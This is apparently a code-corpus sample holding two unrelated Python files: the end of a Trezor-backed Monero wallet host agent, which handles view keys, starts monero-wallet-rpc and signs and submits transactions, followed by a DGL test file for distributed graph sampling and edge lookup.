key_data.m_keys = account_keys
account_keys.m_account_address = xmrtypes.AccountPublicAddress(
m_spend_public_key=crypto.encodepoint(self.pub_spend),
m_view_public_key=crypto.encodepoint(self.pub_view),
)
account_keys.m_spend_secret_key = crypto.encodeint(crypto.sc_0())
account_keys.m_view_secret_key = crypto.encodeint(self.priv_view)
await wallet.save_keys_file(key_file, self.wallet_password, wallet_data)
logger.debug("Watch-only wallet keys generated: %s" % key_file)
async def open_account_passed(self):
"""
Loads passed credentials
:return:
"""
priv_view = self.args.view_key.encode("ascii")
self.priv_view = crypto.b16_to_scalar(priv_view)
self.set_network_type(
monero.NetworkTypes.TESTNET
if self.args.testnet
else monero.NetworkTypes.MAINNET
)
self.set_address(self.args.address.encode("ascii"))
self.wallet_file = self.args.watch_wallet
self.monero_bin = self.args.monero_bin
await self.open_with_keys(self.priv_view, self.address)
async def open_account_file(self, file):
"""
Opens account file
:param file:
:return:
"""
with open(file) as fh:
js = json.load(fh)
# Wallet key encryption
self.wallet_password = await self.prompt_password()
self.wallet_salt = common.defvalkey(js, "wallet_salt")
if self.wallet_salt is None:
self.wallet_salt = crypto.random_bytes(32)
else:
self.wallet_salt = binascii.unhexlify(self.wallet_salt)
# Wallet view key dec.
if "view_key" in js:
self.priv_view = crypto.b16_to_scalar(js["view_key"].encode("utf8"))
elif "view_key_enc" in js:
wallet_enc_key = misc.wallet_enc_key(self.wallet_salt, self.wallet_password)
plain = chacha_poly.decrypt_pack(
wallet_enc_key, binascii.unhexlify(js["view_key_enc"])
)
self.priv_view = crypto.decodeint(plain)
self.wallet_file = js["wallet_file"]
self.monero_bin = js["monero_bin"]
self.set_network_type(js["network_type"])
self.set_address(js["address"].encode("utf8"))
self.rpc_addr = js["rpc_addr"]
await self.open_with_keys(self.priv_view, self.address)
async def open_with_keys(self, view_key, address):
"""
Processess view key private + address
:param view_key:
:param address:
:return:
"""
self.pub_view = crypto.scalarmult_base(view_key)
addr_info = monero.decode_addr(address)
self.pub_spend = crypto.decodepoint(addr_info.spend_key)
if not crypto.point_eq(self.pub_view, crypto.decodepoint(addr_info.view_key)):
raise ValueError(
"Computed view public key does not match the one from address"
)
def set_address(self, address):
self.address = address
self.address_info = monero.decode_addr(self.address)
self.address_base_info = monero.decode_addr(self.address)
self.recompute_address()
def recompute_address(self):
D, C = monero.generate_sub_address_keys(
self.priv_view,
crypto.decodepoint(self.address_base_info.spend_key),
self.account_idx,
0,
)
self.address_info.recompute_sub(
crypto.encodepoint(D), crypto.encodepoint(C), self.account_idx
)
self.address = self.address_info.addr
self.update_prompt()
def set_account(self, new_accound_idx):
self.account_idx = new_accound_idx
self.recompute_address()
def wallet_rpc_main(self, *args, **kwargs):
"""
Wallet RPC thread
:return:
"""
rpc_cmd = os.path.join(self.monero_bin, "monero-wallet-rpc")
if not os.path.exists(rpc_cmd):
logger.error("Wallet rpc binary not found: %s" % rpc_cmd)
sys.exit(1)
self.rpc_passwd = misc.gen_simple_passwd(16)
self.wallet_proxy.set_creds(["trezor", self.rpc_passwd])
args = [
"--daemon-address %s" % misc.escape_shell(self.rpc_addr),
"--wallet-file %s" % misc.escape_shell(self.wallet_file),
"--prompt-for-password",
"--rpc-login=trezor",
"--rpc-bind-port %s" % int(self.rpc_bind_port),
]
if self.args.testnet or self.network_type == monero.NetworkTypes.TESTNET:
args.append("--testnet")
if self.args.debug_rpc:
logger.debug("RPC credentials: trezor:%s" % self.rpc_passwd)
def preexec_function():
os.setpgrp()
cmd = "%s %s" % (rpc_cmd, " ".join(args))
feeder = misc.Feeder()
p = misc.run(
cmd,
input=feeder,
async_=True,
stdout=misc.Capture(timeout=0.1, buffer_size=1),
stderr=misc.Capture(timeout=0.1, buffer_size=1),
cwd=os.getcwd(),
env=None,
shell=True,
preexec_fn=preexec_function,
)
ret_code = 1
out_acc, err_acc = [], []
out_cur, err_cur = [""], [""]
logline_pattern = re.compile(r"^([^\s]+)\s+([^\s]+)\s+\[(.+?)\]\s+([^\s]+?)\s+")
passwd_set = False
def log_parse(line):
m = logline_pattern.match(line)
if m is None:
return None
sev = m.group(4).lower()
sevnum = None
if sev == "error":
sevnum = logging.ERROR
elif sev == "warn" or sev == "warning":
sevnum = logging.WARNING
elif sev == "info":
sevnum = logging.INFO
elif sev == "debug":
sevnum = logging.DEBUG
return m.group(1), m.group(2), m.group(3), m.group(4), sevnum
def process_line(line, is_err=False):
dst = err_acc if is_err else out_acc
dst.append(line)
line_parsed = log_parse(line)
line_printed = False
if line_parsed and line_parsed[4] and line_parsed[4] >= logging.ERROR:
logger.error("RPC_%s: %s" % ("ERR" if is_err else "OUT", line))
line_printed = True
if not line_printed and self.args.debug_rpc:
logger.debug("RPC_%s: %s" % ("ERR" if is_err else "OUT", line))
line_low = line.lower()
if "starting wallet" in line_low:
self.rpc_ready = True
self.on_rpc_ready()
def add_output(buffers, is_err=False):
buffers = [x.decode("utf8") for x in buffers]
lines = [""]
dst_cur = err_cur if is_err else out_cur
for x in buffers:
clines = [v.strip("\r") for v in x.split("\n")]
lines[-1] += clines[0]
lines.extend(clines[1:])
dst_cur[0] += lines[0]
nlines = len(lines)
if nlines > 1:
process_line(dst_cur[0])
dst_cur[0] = ""
for line in lines[1:-1]:
process_line(line, is_err)
dst_cur[0] = lines[-1] or ""
try:
while len(p.commands) == 0:
time.sleep(0.15)
self.rpc_running = True
self.update_prompt()
while p.commands[0].returncode is None:
if not passwd_set:
passwd_set = True
feeder.feed(self.wallet_password)
feeder.feed("\n")
feeder.feed(self.rpc_passwd)
feeder.feed("\n")
out, err = p.stdout.read(-1, False), p.stderr.read(-1, False)
if not common.is_empty(out):
add_output([out])
if not common.is_empty(err):
add_output([err], True)
p.commands[0].poll()
if self.terminating and p.commands[0].returncode is None:
feeder.feed("quit\n\n")
misc.sarge_sigint(p.commands[0])
p.close()
if not common.is_empty(out) or not common.is_empty(err):
continue
time.sleep(0.01)
ret_code = p.commands[0].returncode
try_fnc(lambda: p.stdout.close())
try_fnc(lambda: p.stderr.close())
add_output([p.stdout.read(-1, True, 0.15)])
add_output([p.stderr.read(-1, True, 0.15)], True)
self.rpc_running = False
self.update_prompt()
if not self.terminating:
logger.error("Wallet RPC ended prematurely with code: %s" % ret_code)
logger.info("Command: %s" % cmd)
logger.info("Std out: %s" % "\n".join(out_acc))
logger.info("Error out: %s" % "\n".join(err_acc))
except Exception as e:
logger.error("Exception in wallet RPC command: %s" % e)
self.trace_logger.log(e)
def shutdown_rpc(self):
"""
Waits for rpc shutdown
:return:
"""
if self.args.wallet_rpc_addr: # using already running rpc
return
if not self.rpc_running:
return
# Gracegul stop with save
try:
self.wallet_proxy.stop_wallet()
self.terminating = True
time.sleep(1)
except Exception as e:
logger.warning("Stopping wallet failed: %s" % e)
# Terminating with sigint
logger.info("Waiting for wallet-RPC to terminate...")
self.terminating = True
while self.rpc_running:
time.sleep(0.1)
def on_rpc_ready(self):
"""
Called when RPC is started
:return:
"""
self.update_prompt()
async def wallet_rpc(self):
"""
Starts wallet RPC server
:return:
"""
if self.args.wallet_rpc_addr: # using existing RPC?
self.daemon_rpc.set_addr(self.args.rpc_addr)
self.wallet_proxy.set_addr(self.args.wallet_rpc_addr)
self.wallet_proxy.set_creds(self.args.wallet_rpc_creds)
self.rpc_running = True
self.update_prompt()
return
self.wallet_thread = threading.Thread(target=self.wallet_rpc_main, args=(None,))
self.wallet_thread.setDaemon(False)
self.wallet_thread.start()
async def entry(self):
"""
Entry point
:return:
"""
if self.args.debug:
coloredlogs.install(level=logging.DEBUG, use_chroot=False)
misc.install_sarge_filter()
await self.connect()
await self.open_account()
if self.args.sign:
res = await self.sign_wrap(self.args.sign)
return res if isinstance(res, int) else 0
await self.wallet_rpc()
self.update_intro()
self.cmdloop()
self.shutdown_rpc()
logger.info("Terminating")
#
# Sign op
#
def handle_address_input(self, address, payment_id=None):
try:
address = address.encode("ascii") # make bytes
except:
pass
if payment_id and (len(payment_id) != 16 and len(payment_id) != 64):
self.perror("Payment ID can be either 8B or 32B long")
raise ValueError("Invalid payment ID")
try:
addr_info = monero.decode_addr(address)
if addr_info.is_integrated and payment_id:
raise ValueError(
"Address is integrated (contains payment id), redundant payment_id provided"
)
if payment_id:
payment_id = binascii.unhexlify(payment_id)
except Exception as e:
self.perror("Address invalid: %s, error: %s " % (address, e))
raise
return addr_info, payment_id
def transfer_cmd(self, parts):
"""
Transfer logic
:param parts:
:return:
"""
priority, mixin, payment_id = parts.priority, parts.mixin, parts.payment_id
aux_data = SignAuxData()
aux_data.destinations = []
addr_amnt = parts.address_amounts
destinations = []
new_payment_id = None
for idx, cur in enumerate(addr_amnt):
addr_info, tmp_payment_id = self.handle_address_input(cur[0], payment_id)
amount_atomic = misc.amount_to_uint64(cur[1])
aux_data.destinations.append((addr_info, amount_atomic))
destinations.append(
{"amount": amount_atomic, "address": addr_info.addr.decode("ascii")}
)
if tmp_payment_id:
new_payment_id = tmp_payment_id
print("Sending %s monero to %s" % (cur[1], cur[0]))
print(
"Priority: %s, mixin: %s, payment_id: %s"
% (
priority if priority else "default",
mixin if mixin else "default",
binascii.hexlify(new_payment_id).decode("ascii")
if new_payment_id
else "-",
)
)
ask_res = self.ask_proceed_quit("Do you confirm (y/n) ? ")
if ask_res != self.PROCEED_YES:
return
params = {
"destinations": destinations,
"account_index": self.account_idx,
"subaddr_indices": parts.indices,
"unlock_time": 0,
"get_tx_keys": True,
"do_not_relay": True,
"get_tx_hex": False,
"get_tx_metadata": False,
}
if priority is not None:
params["priority"] = priority
if mixin is not None:
params["mixin"] = mixin
if new_payment_id is not None:
params["payment_id"] = binascii.hexlify(new_payment_id).decode("ascii")
# Call RPC to prepare unsigned transaction
self.transfer_params(params, aux_data)
def sweep_params(self, parts, is_all=False, is_below=False, is_single=False):
params = {"do_not_relay": True}
if parts.priority is not None:
params["priority"] = parts.priority
if parts.mixin is not None:
params["ring_size"] = parts.mixin
if parts.payment_id is not None:
params["payment_id"] = parts.payment_id
if parts.amount_threshold is not None:
params["below_amount"] = misc.amount_to_uint64(parts.amount_threshold)
if parts.key_image is not None:
params["key_image"] = parts.key_image
if not is_single:
params["account_index"] = self.account_idx
params["subaddr_indices"] = parts.indices
params["address"] = parts.address
return params
def sweep_cmd(self, parts, is_all=False, is_below=False, is_single=False):
params = self.sweep_params(parts, is_all, is_below, is_single)
if is_single:
res = self.wallet_proxy.sweep_single(params)
else:
res = self.wallet_proxy.sweep_all(params)
if "result" not in res:
logger.error("Sweep error: %s" % res)
raise ValueError("Could not transfer")
result = res["result"]
amounts = common.defvalkey(
result, "amount_list", [common.defvalkey(result, "amount")]
)
fees = common.defvalkey(result, "fee_list", [common.defvalkey(result, "fee")])
for idx in range(len(amounts)):
st = "Amount: %s" % wallet.conv_disp_amount(amounts[idx])
if idx < len(fees):
st += ", Fee: %s" % wallet.conv_disp_amount(fees[idx])
self.poutput(st)
ask_res = self.ask_proceed_quit("Do you confirm (y/n) ? ")
if ask_res != self.PROCEED_YES:
return
unsigned = binascii.unhexlify(result["unsigned_txset"])
self.wait_coro(self.sign_unsigned(unsigned))
def transfer_params(self, params, aux_data=None):
res = self.wallet_proxy.transfer_split(params)
if "result" not in res:
logger.error("Transfer error: %s" % res)
raise ValueError("Could not transfer")
result = res["result"]
amounts = common.defvalkey(
result, "amount_list", [common.defvalkey(result, "amount")]
)
fees = common.defvalkey(result, "fee_list", [common.defvalkey(result, "fee")])
for idx in range(len(amounts)):
st = "Amount: %s" % wallet.conv_disp_amount(amounts[idx])
if idx < len(fees):
st += ", Fee: %s" % wallet.conv_disp_amount(fees[idx])
self.poutput(st)
ask_res = self.ask_proceed_quit("Do you confirm (y/n) ? ")
if ask_res != self.PROCEED_YES:
return
if "unsigned_txset" not in result:
logger.error(
"Unsigned transaction not found in the response. "
"Please make sure you are using compatible monero-wallet-rpc"
)
logger.debug(res)
return
unsigned = binascii.unhexlify(result["unsigned_txset"])
self.wait_coro(self.sign_unsigned(unsigned, aux_data))
async def sign_unsigned(self, unsigned_txset, aux_data=None):
"""
Signs unsigned txset with the Trezor
:param unsigned_txset:
:return:
"""
res = await self.sign_wrap(fdata=unsigned_txset, aux_data=aux_data)
if isinstance(res, int):
logger.error("Error")
return
print("Transaction has been signed. ")
ask_res = self.ask_proceed_quit("Do you wish to submit (y/n) ? ")
if ask_res != self.PROCEED_YES:
return
params = {"tx_data_hex": binascii.hexlify(res).decode("ascii")}
res = self.wallet_proxy.submit_transfer(params)
try:
if len(res["result"]["tx_hash_list"]) == 0:
raise ValueError("Transaction submit failed")
print("SUCCESS: Transaction has been submitted!")
except Exception as e:
logger.debug("Res: %s" % res)
print("Transaction submit failed: %s" % e)
async def sign_wrap(self, file=None, fdata=None, aux_data=None):
"""
Sign wrapper
:param file:
:param fdata:
:param aux_data:
:return:
"""
if not self.priv_view:
logger.error("View key not set, cannot sign")
return -3
try:
return await self.sign(file, fdata, aux_data=aux_data)
except agent_misc.TrezorReturnedError as e:
self.trace_logger.log(e)
print("Trezor returned an error: %s" % e)
return 1
except agent_misc.TrezorNotRunning as e:
logger.error("Trezor server is not running")
return 2
async def sign(self, file=None, fdata=None, aux_data=None):
"""
Performs TX signature
:param file:
:param fdata:
:param aux_data:
:return:
"""
try:
await self.trezor_proxy.ping()
except Exception as e:
raise agent_misc.TrezorNotRunning(e)
if file and not os.path.exists(file):
raise ValueError("Could not find unsigned transaction file")
data = fdata
if data is None:
with open(file, "rb") as fh:
data = fh.read()
msg = await wallet.load_unsigned_tx(self.priv_view, data)
# Key image sync
# key_images = await self.agent.import_outputs(msg.transfers)
# For now sync only spent key images to the hot wallet.
key_images = [td.m_key_image for td in msg.transfers]
max_ki_size = 0
if len(key_images) == 0:
logger.info("Wallet did not return transfer list :/")
for tx in msg.txes:
for idx in range(len(tx.selected_transfers)):
max_ki_size = max(max_ki_size, tx.selected_transfers[idx])
key_images = [crypto.identity(True)] * (max_ki_size + 1)
txes = []
pendings = []
for tx in msg.txes: # type: xmrtypes.TxConstructionData
print("Signing transaction with Trezor")
print("Please check the Trezor and confirm / reject the transaction\n")
res = await self.agent.sign_transaction_data(tx, aux_data=aux_data)
cdata = self.agent.last_transaction_data()
await self.store_cdata(cdata, res, tx, msg.transfers)
# obj = await xmrobj.dump_message(None, res)
# print(xmrjson.json_dumps(obj, indent=2))
# Key image sync for spent TXOs
# Updating only spent.
for idx in range(len(tx.selected_transfers)):
idx_mapped = cdata.source_permutation[idx]
key_images[tx.selected_transfers[idx_mapped]] = res.vin[idx].k_image
txes.append(await self.agent.serialize_tx(res))
pending = wallet.construct_pending_tsx(res, tx)
pendings.append(pending)
# Key images array has to cover all transfers sent.
# Watch only wallet does not have key images.
signed_tx = xmrtypes.SignedTxSet(ptx=pendings, key_images=key_images)
signed_data = await wallet.dump_signed_tx(self.priv_view, signed_tx)
with open("signed_monero_tx", "wb+") as fh:
fh.write(signed_data)
print("Signed transaction file: signed_monero_tx")
print(
"Key images: %s"
% [binascii.hexlify(ff).decode("utf8") for ff in key_images]
)
for idx, tx in enumerate(txes):
fname = "transaction_%02d" % idx
with open(fname, "wb+") as fh:
fh.write(tx)
# relay_fname = 'transaction_%02d_relay.sh' % idx
# hex_ctx = binascii.hexlify(tx).decode('utf8')
# with open(relay_fname, 'w+') as fh:
# fh.write('#!/bin/bash\n')
# fh.write('curl -X POST http://%s/sendrawtransaction '
# '-d \'{"tx_as_hex":"%s", "do_not_relay":false}\' '
# '-H \'Content-Type: application/json\'\n' % (self.args.rpc_addr, hex_ctx))
#
# print('Transaction %02d stored to %s, relay script: %s' % (idx, fname, relay_fname))
# Relay:
# payload = {'tx_as_hex': hex_ctx, 'do_not_relay': False}
# resp = requests.post('http://%s/sendrawtransaction' % (self.args.rpc_addr, ), json=payload)
# print('Relay response: %s' % resp.json())
# print('Please note that by manual relaying hot wallet key images get out of sync')
return signed_data
async def store_cdata(self, cdata, signed_tx, tx, transfers):
"""
Stores transaction data for later usage.
- cdata.enc_salt1, cdata.enc_salt2, cdata.enc_keys
- tx_keys are AEAD protected, key derived from spend key - only token can open.
- construction data for further proofs.
:param cdata:
:param signed_tx:
:param tx:
:param transfers:
:return:
"""
hash = cdata.tx_prefix_hash
prefix = binascii.hexlify(hash[:12])
tx_key_salt = crypto.random_bytes(32)
tx_key_inp = hash + crypto.encodeint(self.priv_view)
tx_view_key = crypto.pbkdf2(tx_key_inp, tx_key_salt, 2048)
unsigned_data = xmrtypes.UnsignedTxSet()
unsigned_data.txes = [tx]
unsigned_data.transfers = transfers if transfers is not None else []
writer = xmrserialize.MemoryReaderWriter()
ar = xmrboost.Archive(writer, True)
await ar.root()
await ar.message(unsigned_data)
unsigned_key = crypto.keccak_2hash(b"unsigned;" + tx_view_key)
ciphertext = chacha_poly.encrypt_pack(unsigned_key, bytes(writer.get_buffer()))
# Serialize signed transaction
writer = xmrserialize.MemoryReaderWriter()
ar = xmrserialize.Archive(writer, True)
await ar.root()
await ar.message(signed_tx)
signed_tx_bytes = writer.get_buffer()
signed_tx_hmac_key = crypto.keccak_2hash(b"hmac;" + tx_view_key)
signed_tx_hmac = crypto.compute_hmac(signed_tx_hmac_key, signed_tx_bytes)
try:
js = {
"time": int(time.time()),
"hash": binascii.hexlify(hash).decode("ascii"),
"enc_salt1": binascii.hexlify(cdata.enc_salt1).decode("ascii"),
"enc_salt2": binascii.hexlify(cdata.enc_salt2).decode("ascii"),
"tx_keys": binascii.hexlify(cdata.enc_keys).decode("ascii"),
"unsigned_data": binascii.hexlify(ciphertext).decode("ascii"),
"tx_salt": binascii.hexlify(tx_key_salt).decode("ascii"),
"tx_signed": binascii.hexlify(signed_tx_bytes).decode("ascii"),
"tx_signed_hmac": binascii.hexlify(signed_tx_hmac).decode("ascii"),
}
with open("transaction_%s.json" % prefix.decode("ascii"), "w") as fh:
json.dump(js, fh, indent=2)
fh.write("\n")
except Exception as e:
self.trace_logger.log(e)
print(
"Unable to save transaction data for transaction %s"
% binascii.hexlify(hash).decode("ascii")
)
async def key_image_sync(self, line):
"""
Key image sync with Trezor
:param line:
:return:
"""
res = self.wallet_proxy.export_outputs()
outputs_data_hex = res["result"]["outputs_data_hex"]
outs_data = binascii.unhexlify(outputs_data_hex)
exps = await wallet.load_exported_outputs(self.priv_view, outs_data)
# Check if for this address
match = exps.m_spend_public_key == crypto.encodepoint(
self.pub_spend
) and exps.m_view_public_key == crypto.encodepoint(self.pub_view)
net_ver = monero.net_version(self.network_type, False)
addr = monero.encode_addr(
net_ver, exps.m_spend_public_key, exps.m_view_public_key
)
if not match:
logger.error(
"Exported outputs from different wallet: %s" % addr.decode("ascii")
)
return
self.poutput("Exported outputs loaded.")
self.poutput("Please confirm the key image sync on the Trezor ")
res = await self.agent.import_outputs(exps.tds)
# Generate import key image requests
key_images = []
for kie in res:
key_images.append(
{
"key_image": binascii.hexlify(kie[0]).decode("ascii"),
"signature": binascii.hexlify(kie[1][0] + kie[1][1]).decode(
"ascii"
),
}
)
import_req = {"signed_key_images": key_images}
res = self.wallet_proxy.import_key_images(import_req)
print("Height: %s" % res["result"]["height"])
print("Spent: %.5f" % wallet.conv_disp_amount(res["result"]["spent"]))
print("Unspent: %.5f" % wallet.conv_disp_amount(res["result"]["unspent"]))
async def main(self):
"""
Entry point
:return:
"""
parser = argparse.ArgumentParser(description="Trezor Agent")
parser.add_argument("--address", dest="address", help="Full address")
parser.add_argument(
"--view-key", dest="view_key", help="Hex coded private view key"
)
parser.add_argument(
"--account-file",
dest="account_file",
help="Account file with watch-only creds",
)
parser.add_argument(
"--watch-wallet", dest="watch_wallet", help="Watch-only wallet files"
)
parser.add_argument(
"--monero-bin", dest="monero_bin", help="Directory with monero binaries"
)
parser.add_argument(
"--rpc-addr", dest="rpc_addr", default=None, help="RPC address of full node"
)
parser.add_argument(
"--rpc-wallet",
dest="wallet_rpc_addr",
default=None,
help="Use running monero-wallet-rpc",
)
parser.add_argument(
"--rpc-wallet-creds",
dest="wallet_rpc_creds",
default=None,
help="Running monero-wallet-rpc credentials",
)
parser.add_argument(
"--sign", dest="sign", default=None, help="Sign the unsigned file"
)
parser.add_argument(
"--debug",
dest="debug",
default=False,
action="store_const",
const=True,
help="Debugging output",
)
parser.add_argument(
"--debug-rpc",
dest="debug_rpc",
default=False,
action="store_const",
const=True,
help="Prints output of the RPC wallet",
)
parser.add_argument(
"--testnet",
dest="testnet",
default=False,
action="store_const",
const=True,
help="Testnet",
)
parser.add_argument(
"--slip0010",
dest="slip0010",
default=True,
action="store_const",
const=True,
help="SLIP0010 wallet derivation (deprecated, always true)",
)
parser.add_argument(
"--trezor",
dest="trezor",
default=True,
action="store_const",
const=True,
help="Use Trezor connector",
)
parser.add_argument(
"--trezor-path", dest="trezor_path", default=None, help="Trezor path"
)
parser.add_argument(
"--poc",
dest="poc",
default=False,
action="store_const",
const=True,
help="Use PoC Trezor emulation",
)
parser.add_argument(
"--patch-client",
dest="patch_client",
default=False,
action="store_const",
const=True,
help="Monkey pathing of Trezor client",
)
parser.add_argument(
"--no-init",
dest="no_init",
default=False,
action="store_const",
const=True,
help="Do not require device initialization",
)
args_src = sys.argv
self.args = parser.parse_args(args=args_src[1:])
if self.args.rpc_addr:
if not re.match(r"^\[?([.0-9a-f:]+)\]?(:[0-9]+)?$", self.args.rpc_addr):
logger.error("Invalid deamon address: %s" % self.args.rpc_addr)
return -1
sys.argv = [args_src[0]]
res = await self.entry()
sys.argv = args_src
return res
async def amain():
agent = HostAgent()
res = await agent.main()
sys.exit(res)
def main():
loop = asyncio.get_event_loop()
loop.run_until_complete(amain())
# loop.run_forever()
loop.close()
if __name__ == "__main__":
main()
|
test_distributed_sampling.py
|
import dgl
import unittest
import os
from dgl.data import CitationGraphDataset
from dgl.distributed import sample_neighbors, find_edges
from dgl.distributed import partition_graph, load_partition, load_partition_book
import sys
import multiprocessing as mp
import numpy as np
import backend as F
import time
from utils import get_local_usable_addr
from pathlib import Path
import pytest
from dgl.distributed import DistGraphServer, DistGraph
def start_server(rank, tmpdir, disable_shared_mem, graph_name):
g = DistGraphServer(rank, "rpc_ip_config.txt", 1, 1,
tmpdir / (graph_name + '.json'), disable_shared_mem=disable_shared_mem)
g.start()
def start_sample_client(rank, tmpdir, disable_shared_mem):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_sampling", gpb=gpb)
try:
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
except Exception as e:
print(e)
sampled_graph = None
dgl.distributed.exit_client()
return sampled_graph
def start_find_edges_client(rank, tmpdir, disable_shared_mem, eids):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_find_edges.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_find_edges", gpb=gpb)
try:
u, v = find_edges(dist_graph, eids)
except Exception as e:
print(e)
u, v = None, None
dgl.distributed.exit_client()
return u, v
def check_rpc_sampling(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
print(g.idtype)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
def check_rpc_find_edges(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_find_edges', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_find_edges'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
eids = F.tensor(np.random.randint(g.number_of_edges(), size=100))
u, v = g.find_edges(eids)
du, dv = start_find_edges_client(0, tmpdir, num_server > 1, eids)
assert F.array_equal(u, du)
assert F.array_equal(v, dv)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling(Path(tmpdirname), 2)
def check_rpc_sampling_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64)
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64)
for i in range(num_server):
part, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_sampling_shuffle(num_server):
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling_shuffle(Path(tmpdirname), num_server)
def check_standalone_sampling(tmpdir):
g = CitationGraphDataset("cora")[0]
num_parts = 1
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_sampling", part_config=tmpdir / 'test_sampling.json')
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
dgl.distributed.exit_client()
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_standalone_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'standalone'
with tempfile.TemporaryDirectory() as tmpdirname:
check_standalone_sampling(Path(tmpdirname))
def start_in_subgraph_client(rank, tmpdir, disable_shared_mem, nodes):
gpb = None
dgl.distributed.initialize("rpc_ip_config.txt", 1)
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_in_subgraph.json', rank)
dist_graph = DistGraph("test_in_subgraph", gpb=gpb)
try:
sampled_graph = dgl.distributed.in_subgraph(dist_graph, nodes)
except Exception as e:
print(e)
sampled_graph = None
dgl.distributed.exit_client()
return sampled_graph
def check_rpc_in_subgraph(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_in_subgraph', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_in_subgraph'))
p.start()
time.sleep(1)
pserver_list.append(p)
nodes = [0, 10, 99, 66, 1024, 2008]
time.sleep(3)
sampled_graph = start_in_subgraph_client(0, tmpdir, num_server > 1, nodes)
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
subg1 = dgl.in_subgraph(g, nodes)
src1, dst1 = subg1.edges()
assert np.all(np.sort(F.asnumpy(src)) == np.sort(F.asnumpy(src1)))
assert np.all(np.sort(F.asnumpy(dst)) == np.sort(F.asnumpy(dst1)))
eids = g.edge_ids(src, dst)
